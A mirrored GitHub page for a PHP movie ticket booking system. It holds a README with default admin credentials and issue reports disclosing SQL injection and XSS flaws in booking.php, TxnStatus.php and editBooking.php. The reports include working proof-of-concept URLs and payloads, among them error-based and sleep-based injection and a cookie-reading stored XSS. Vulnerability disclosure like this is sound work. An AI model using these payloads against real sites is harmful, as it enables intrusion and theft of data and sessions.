Giter Site home page Giter Site logo

aman05382 / movie_ticket_booking_system_php Goto Github PK

View Code? Open in Web Editor NEW
31.0 2.0 14.0 14.07 MB

Movie Ticket Booking System, back-end coded with PHP and front-end coded with Bootstrap, CSS, HTML, and Javascript and used MySql in the database.

CSS 4.15% PHP 90.64% JavaScript 0.74% Hack 3.77% Batchfile 0.01% Shell 0.01% HTML 0.69%
theatre-booking ticketing-system movies booking-system cinema management system php mysql phpmyadmin

movie_ticket_booking_system_php's Introduction

Movie Ticket Booking System-PHP

Movie Ticket Booking System, back-end coded with PHP and front-end coded with Bootstrap, CSS, HTML, and Javascript and used MySql in the database.

The Movie Ticket Booking System facilitates the users to enquire about the recent movies available movies, booking, and cancellation of movie tickets according to theatre type and class type, enquire about the status of the booked tickets, etc. The aim of this project is to design a website that gives an easy platform for people to get details of trending films and to get movie tickets in the easiest possible way making it simple for all to buy tickets from anytime and anywhere.

Github_theme

Github_theme

Installation

For This Project I used Xampp.

1) Open PHPMyAdmin
2) import 'cinema_db.sql'
3) Open Connection.php and update db_name and password.
4) Go to admin Folder and Open config.php and update db_name and password.

Usage

Admin Login Details

Username:- 123
Password:- 123

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

IMAGES

Created By

aman05382 RoshanB392 Yadav99 ramtekerohit

movie_ticket_booking_system_php's People

Contributors

aman05382 avatar prajwalscodestack avatar roshan-bonde avatar yadav99 avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar

Forkers

yadav99 abhiklodh purthashaariyaar antlio20 triazinekapil m4lwhere abdurrauf2022 silverbudda martin76110 sharksxsx develophase magupallikarlayya ind4mnl4t0r carsben5

movie_ticket_booking_system_php's Issues

Movie Ticket Booking System-PHP SQL injection vulnerability exists

Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4

1.Movie Ticket Booking System-PHP SQL injection vulnerability exists

In Booking Php, from line 4 to line 12 of the code,the value of id is passed to the backend through the get request, and is assigned to the variable $id, then $id is substituted into the database for query, and the value is assigned to the variable $movieQuery, and then the query result mysqli is returned_ query, SQL error injection vulnerability

1130sqldaima

POC:

http://vulcinema.test/booking.php?id=3%20or%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

1130user

Movie Ticket Booking System-PHP XSS vulnerability

Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4

1.Movie Ticket Booking System-PHP XSS vulnerability

There is an XSS vulnerability in Booking In PHP, at line 111, we can see that the value is equal to the value of the variable $id, and the $id controllable variable is determined by user input and output directly. At this time, we can construct a closed XSS statement. The payload is "><script>alert (" ace ")</script>, and then we can construct a pop-up window

<input type="hidden" name="movie_id" value="<?php echo $id; ?>">

POC:

http://vulcinema.test/booking.php?id=5%22%3E%3Cscript%3Ealert(%22ace%22)%3C/script%3E

1130alert

Movie Ticket Booking System-PHP XSS vulnerability

Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4

1.Movie Ticket Booking System-PHP XSS vulnerability

inTxnStatus. Php, code line 17: ORDER_ The variable $ORDER whose ID is input by the user and assigned through POST request_ The ID is then directly output in line 44 of the code. Value="">There is no filtering. That is to say, we can construct a closed javascript statement to pop up the page. However, we can bypass the character limit at the front end, which is very simple

$ORDER_ID = $_POST["ORDER_ID"];
<td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value="<?php echo $ORDER_ID ?>">

PAYLOAD:

"><script>alert("ace")</script>

1201postxss

xssalertaces

Then check the website source code:

<td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value=""><script>alert("ace")</script>">

Movie Ticket Booking System-PHP SQL injection vulnerability exists

Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4

1.Movie Ticket Booking System-PHP SQL injection vulnerability exists

At editBooking In PHP, in lines 30-38 of the code, the parameters requested by the front-end POST include first, last, number, email, and amount, while the variable $id is controllable. In lines 17-19 of the code, it is directly substituted into the database for query. In line 38 of the code, a SQL injection vulnerability is generated at $id

  • SQL injection delay 5 seconds

1201delay5s

  • SQL injection delay 10 seconds

1202delay10s

POC:

http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(10)))--%20ace
http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(5)))--%20ace

Movie Ticket Booking System-PHP-There is a storage XSS vulnerability

Building environment:Apache2.4.49;MySQL5.7.26;PHP7.3.4

Movie Ticket Booking System-PHP-There is a storage XSS vulnerability

At editBooking In PHP, from the 63rd line of code to the 70th line of code, the content entered by the user is directly stored in the database without filtering, and then displayed and processed in view.php, and then viewed In PHP, from line 91 to line 101, the content input by the front end is directly output without any tag closing

1201qdsc

POC:

ace<script>alert(document.cookie)</script>

1201cookie

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.